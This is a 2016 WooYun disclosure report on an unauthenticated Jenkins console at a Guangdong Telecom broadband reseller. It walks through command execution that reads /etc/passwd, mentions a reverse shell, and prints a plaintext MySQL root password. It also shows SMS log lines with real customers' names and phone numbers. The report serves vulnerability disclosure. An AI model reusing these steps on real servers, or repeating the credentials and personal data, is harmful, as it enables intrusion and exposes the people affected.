当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0181421

漏洞标题:广东电信某宽带代理商某处未授权访问导致命令执行(数据库泄漏涉及10多万用户帐号密码身份证住址信息大量)

相关厂商:广东电信

漏洞作者: Weiy、

提交时间:2016-03-06 12:00

修复时间:2016-04-24 11:44

公开时间:2016-04-24 11:44

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-06: 细节已通知厂商并且等待厂商处理中
2016-03-10: 厂商已经确认,细节仅向厂商公开
2016-03-20: 细节向核心白帽子及相关领域专家公开
2016-03-30: 细节向普通白帽子公开
2016-04-09: 细节向实习白帽子公开
2016-04-24: 细节向公众公开

简要描述:

广东电信某宽带代理商某处未授权访问导致命令执行、数据库泄漏导致用户信息大量泄漏、
铭感信息请审核打码。 我只想要安全的开个宽带、这都不行吗??????
审核顺便把 一月份我交的漏洞审核了了现在都三月了、谢谢:wooyun-2016-0167341

详细说明:

http://**.**.**.**/
广东电信宽带网络分销平台

00.png


主办单位名称
深圳市万达世纪广告有限公司使用高级查询纠正信息
主办单位性质
企业
网站备案/许可证号
粤ICP备13059198号-1查看截图
网站名称
广东电信宽带网络分销平台
网站首页网址
**.**.**.**


1.png


http://**.**.**.**:8888/manage jenkins未授权访问

4.png


http://**.**.**.**:8888/script
命令执行、

eth1      Link encap:Ethernet  HWaddr 02:00:40:51:00:F8  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::40ff:fe51:f8/64 Scope:Link


5.png


println "cat /etc/passwd".execute().text

oot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin


利用 back.py 反弹shell 过来、

7.png


数据库信息

# JDBC - MySQL connection settings
jdbc.url=jdbc:mysql://localhost/crunddb
jdbc.driver=com.mysql.jdbc.Driver
jdbc.user=md
jdbc.password=
jdbc.autoCommit=false


8.png


一些上传的图片信息可惜 下载不下了

9.png


http://**.**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/13332800028/20160302190142A005.jpg
http://**.**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/yhlxdn/20160303100618C085.jpg

10.png


11.png


在这个目录里存在大量的身份证信息
/usr/local/tomcat/webapps/yh/upload

12.png


找到了数据库
#MySQL Setting ########
database.driverClassName = com.mysql.jdbc.Driver
database.url = jdbc:mysql**.**.**.**:3306/wanda?useUnicode=true&characterEncoding=utf8
#database.url = jdbc:mysql://localhost:3306/wanda?useUnicode=true&characterEncoding=utf8
database.username = root
database.password = wandashiji

13.png


连接数据库、哈哈、

14.png


成功。

15.png


看看数据
两万多用户信息
wan_user 25922

16.png



18.png


17.png


2016-03-05 15:15:53	0	13377691499	252538	18929212921	您名下吕小刚的订单已经受理成功,接入号为:YFFADSLD2292094596,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。	发送成功
2016-03-05 15:16:13 0 13377691499 252536 18929212921 您名下"易宗宝"的订单受理异常-挂起订单:【非光纤】地址非光纤,铜线ID:353727637
,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:20:12 0 18922896002 252537 18922896002 您名下余彬的订单已经受理成功,接入号为:YFFADSLD2292094622,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:21:31 0 ns88xsj 252439 13928758128 您名下"刘志勇"的订单受理异常-挂起订单:【用户资料问题】地址不详,请提供详细地址,或提供铜线地址ID,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:24:22 0 13377691499 252530 18929212921 您名下陈汉钦的订单已经受理成功,接入号为:YFFADSLD2292094646,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:26:22 0 13377691499 252508 18929212921 您名下"高倩"的订单受理异常-挂起订单:【用户资料问题】ID地址与单面地址不同,请自行登录分销系统查看,谢谢!本短信由系统自动发出,请勿回复。 发送成功
2016-03-05 15:40:08 0 13377691499 252508 18929212921 您名下高倩的订单已经受理成功,接入号为:YFFADSLD2292095806,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 15:44:48 0 18922896002 252534 18922896002 您名下曹海锋的订单已经受理成功,接入号为:YFFADSLD2292095836,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功
2016-03-05 16:07:16 0 13377691499 252548 18929212921 您名下崔安华的订单已经受理成功,接入号为:YFFADSLD2292096036,可登陆分销系统查看,谢谢!短信自动发出,请勿回复。 发送成功


19.png


wan_order 111192
宽带安装信息

20.png


21.png


11万的客户信息安装宽带信息泄漏、

22.png


又是9千多的身份信息。

23.png


24.png


ok

漏洞证明:

在上面的了、

修复方案:

管理员自己补洞吧、、

版权声明:转载请注明来源 Weiy、@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-10 11:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-07 18:27 | fakeidentity ( 路人 | Rank:19 漏洞数:7 | 既然给了我天空,那还束缚我干吗)

    朋友~有联系方式吗 厂家想找你。